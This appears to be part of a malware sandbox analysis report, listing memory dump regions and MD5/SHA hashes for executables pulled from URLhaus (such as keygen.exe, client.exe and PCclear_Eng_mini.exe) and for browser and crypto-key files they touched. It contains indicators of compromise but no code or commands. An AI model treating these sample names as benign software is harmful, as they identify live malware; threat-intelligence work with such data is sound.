memory/4312-847-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-845-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-843-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-841-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-839-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-837-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-833-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-831-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-829-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-827-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-821-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-819-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-816-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-825-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
| MD5 | b41541e6a56a4b091855938cefc8b0f0 |
| SHA1 | 8006b2728d05eab4c5d6dc0bb3b115ddc1e2eaa7 |
| SHA256 | d4c48762f128436fed18b9c714e55bf7360802127efb233ad31ec4b0f7f649b1 |
| SHA512 | a3c2b5dddbb5b8ded63e04672610287458b4bed6ea054e45804e612a2896d92412ef632c621a49b445412d8998a5edc914b055502e22fcfe0e178e5098b64828 |
memory/4312-2015-0x000001E7F0A50000-0x000001E7F0B5E000-memory.dmp
memory/4312-2016-0x000001E7F0650000-0x000001E7F069C000-memory.dmp
memory/3636-2018-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\84KCLP1T\download[2].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/3116-2027-0x0000000000320000-0x0000000000396000-memory.dmp
memory/3116-2046-0x00000000076B0000-0x00000000076CA000-memory.dmp
memory/3116-2047-0x0000000006FB0000-0x0000000006FB6000-memory.dmp
memory/4048-2049-0x0000000000400000-0x000000000047D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe
| MD5 | 6b84d200c817fd3956d0521f4ba0d1c5 |
| SHA1 | 14c69b9b4b199c1f21b31ddbde3ce3141a25131d |
| SHA256 | f0e0068b11df929aec7260f53bb5ddf84835a6524fe187724340f23ed09bb639 |
| SHA512 | c8f96c208624b348262755aeeb8c89c84aac09c14a5960f77f292110125cebc72685323508195e7c61d8f2c57feb9ed74af5c9a60847a229327c29db6cf8a049 |
memory/4800-2056-0x0000000000400000-0x000000000041C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
| MD5 | 759f5a6e3daa4972d43bd4a5edbdeb11 |
| SHA1 | 36f2ac66b894e4a695f983f3214aace56ffbe2ba |
| SHA256 | 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d |
| SHA512 | f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmnzbik1.o2z.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3164-2102-0x0000018378140000-0x0000018378162000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bc20bff934a86acf6898a4986bcceaf9 |
| SHA1 | bf54082121ca18c9739de73a50b84f07ab6f0513 |
| SHA256 | 093cb3ac4446458114d8c8e4e47fe26cc31e32e6ff26b0f1ef0a5c626689aa71 |
| SHA512 | 519660378b15bc02fdc274a8ab811a45b9e52b70254485c20cc9e275639aee90ac4c3ec057a668237bd10400f988a3d1db621508dbcd60bd93dd731ebde8e740 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/4312-2199-0x000001E7F0BA0000-0x000001E7F0BF4000-memory.dmp
memory/4272-2210-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/4272-2215-0x0000024B00360000-0x0000024B00368000-memory.dmp
memory/4272-2244-0x0000024B1A5F0000-0x0000024B1A6FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
| MD5 | d76e1525c8998795867a17ed33573552 |
| SHA1 | daf5b2ffebc86b85e54201100be10fa19f19bf04 |
| SHA256 | f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd |
| SHA512 | c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd |
memory/4800-4899-0x0000000000400000-0x000000000041C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
| MD5 | d57c5086ea166bc56e091761a43781ff |
| SHA1 | 16b7a96e3c43e82ca962bd94ae1898f796c9cd00 |
| SHA256 | dc08aa33da827c3199f3f0345606b97b83bc508239c4c24f02a78d6e996bca09 |
| SHA512 | 893a1fea55837f2cb7cca1a22ab18795c3fcf91edcdf506c269415b06257d17c8fc426b50a8aa2e4dd34de73cc8fe41711b3276b16499a56714aecd2b98cccda |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c1300146567d69e9343e4bffb9b5d018 |
| SHA1 | 966f6a7deb9a16ea0f0ab102ee94176b8c864c64 |
| SHA256 | 869cdb4a4fb16f52178d549b4eaf6b8bdaa32aacb06d638747a420acb3a8997c |
| SHA512 | b0b8bc98dae0a186775365c108bbbe3b770bb64905c6057cba420e2a4e9aa1f6351f187d465cb2162514552f2f391a90a6aa660de3169c0778891f04b09c24f4 |
memory/8012-6110-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 57c05aca699f10d19fd24db73e576240 |
| SHA1 | cac9fbbf45fe21d31352154300d2c9b7411ce943 |
| SHA256 | 35ee3fcf8ab2bc20e87670936b80ce5d9d89c4491d5ec72de31a48784e932bcb |
| SHA512 | 9e4258c72c6d0702c64a3e0b6780b7f1fb19c4d5e928f0287ec5b0e6adfe2040542bca252dc5a4cebd675ddb5d1d1d53701baecb838c592360b9fc9a1e832245 |
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
| MD5 | f7f61ffb8e1f1e272bdf4d326086e760 |
| SHA1 | 452117f31370a5585d8615fc42bc31fdbe32a348 |
| SHA256 | e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af |
| SHA512 | 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f |
memory/4272-6328-0x0000024B01BC0000-0x0000024B01C16000-memory.dmp
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
| MD5 | c3192af2dff9319b35ec48b6fe23b0ff |
| SHA1 | 3713858569b97f4044caf9f2e0f8ad5b6b2ef713 |
| SHA256 | aec05f916b60a80379a0ecde59749ec89beaa0d331e67846f172dbdce858f278 |
| SHA512 | dea78632c6e7d4b749982765857de3daab0ecd2a92ae38a7497d5bdfa6d56d7b8a2378a3043455b645526f67fcdebeaff09d5799c410b383e50e44fa46acd0cd |
memory/5796-6355-0x0000000000400000-0x0000000000727000-memory.dmp
memory/8012-6357-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
| MD5 | 3bd08acd4079d75290eb1fb0c34ff700 |
| SHA1 | 84d4d570c228271f14e42bbb96702330cc8c8c2d |
| SHA256 | 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8 |
| SHA512 | 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760 |
memory/6420-6387-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2964-6396-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe
| MD5 | 5c71794e0bfd811534ff4117687d26e2 |
| SHA1 | f4e616edbd08c817af5f7db69e376b4788f835a5 |
| SHA256 | f5740aded1f401665ab8bde43afee5dc0b01aa8aacabe9b8bb61b1ef52134a39 |
| SHA512 | a7a489d39d2cabdd15fd23354140c559a93969a7474c57553c78dbb9ebbf045541f42c600d7d4bea54a2a1f1c6537b8027a1f385fde6040f339959862ac2ea54 |
C:\Users\Admin\AppData\Local\Temp\nssB09F.tmp\ioSpecial.ini
| MD5 | 82e897f156e4c82d548dd708f837f0a2 |
| SHA1 | 58c05ee7c4a4b2a855858c99744e50220a65c1b6 |
| SHA256 | 719161d6e20fa3dd95dd290b6eca348c15a686cc7d17c368e7701f5bd2f7e45c |
| SHA512 | 05e1d2a0faf3f57371046e6a9a2a10a6aa92cf49ff62c7c5f4e160a458fddc4cbb7b98c139fbcea62688af96e7910271e4575c576bccff3630c3d0632f881a78 |
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
| MD5 | 6f154cc5f643cc4228adf17d1ff32d42 |
| SHA1 | 10efef62da024189beb4cd451d3429439729675b |
| SHA256 | bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff |
| SHA512 | 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1 |
memory/7820-6496-0x00000000007C0000-0x0000000000AE4000-memory.dmp
memory/3636-6509-0x0000000000400000-0x00000000008BA000-memory.dmp
memory/7980-6511-0x000000001C9F0000-0x000000001CA40000-memory.dmp
memory/7980-6532-0x000000001CB00000-0x000000001CBB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d13f5d41f67a0df14853e98df208b3b7 |
| SHA1 | ee690d3a174496644b6adc2d59212df297548f21 |
| SHA256 | bfc826802caaed41b806a6509b42e7cc055f46f99e0dc78e81f64e6bd0615f8e |
| SHA512 | f90441bf3466d8bfc2fbb406670a85455c08b0f5cab306c66cef64e9c8c81c19f585a2dade720e3946202c6729e20ba03cf38bad8167b2ec3e5dc6c742485395 |
memory/5796-6563-0x0000000000400000-0x0000000000727000-memory.dmp
memory/6420-6568-0x0000000000400000-0x000000000042B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d2afd93fcb553f22eb199a5cbc5fb70f |
| SHA1 | cf79b779b230eccdce31ce22f8745a2c00d4bbac |
| SHA256 | e4d68c1a2cc7aaadfb03dcd713c8041bbef28dd225f17be8ab7ff64832fab346 |
| SHA512 | bfb835571b4d4428711c5777c01918fb0f1f6791a60dfdc41b69439f706092910552405344533a59bf2795f672c3241bc83b78ce8a68d540645d25a472817304 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 7c13e1ef9a7825a781ca4137780f732e |
| SHA1 | 480e51fdb6060b7573bffd8064db1c7abaf3bd07 |
| SHA256 | f532fa4b25f7a3c90c2c7524324394b1562f5bd3ad2eabcbf632b6c5046108ac |
| SHA512 | 557e833baf1f281b77fdb858112b0ea097674fd0a419de298ee1d398cc669d77f3cd7fe58cf491185e0092f257c2f9b39598df976fb4a65d0a5398c749a9d688 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d83a.TMP
| MD5 | 6946c194f288b2bf3305e516b8c48f83 |
| SHA1 | da72e14366952d95a44146eb32cb19bfecf2c8b7 |
| SHA256 | b85dae14f3385d5c0417569b12a70a634b31451bcf73f32017591a230dad5f9c |
| SHA512 | 1ebbc2a0172211d63f42db22c39e3e1ebe90454de7bf5b125f9f63921d2bcc551634910b3f4cebb19491785a0d5b0d59f0847a7951d3a632c5836b332273419c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 99fd9a26b574900b8812fdad22c15e33 |
| SHA1 | b67a0d80f8a255e2a0fc404933a059b7400ab7b1 |
| SHA256 | 10cb8296d9b3d4ea62eed7ecf55a70364fe101f266f146a96b2bf6170ef73416 |
| SHA512 | b4d6867f7d2da2b6e6cd2176079dff757e1f993cf7eb2b5aeb257932c3cc17a0cbfd1655b6169773088bbfbc503bb9c097daf6ea14c329ce083426ddf3c286fe |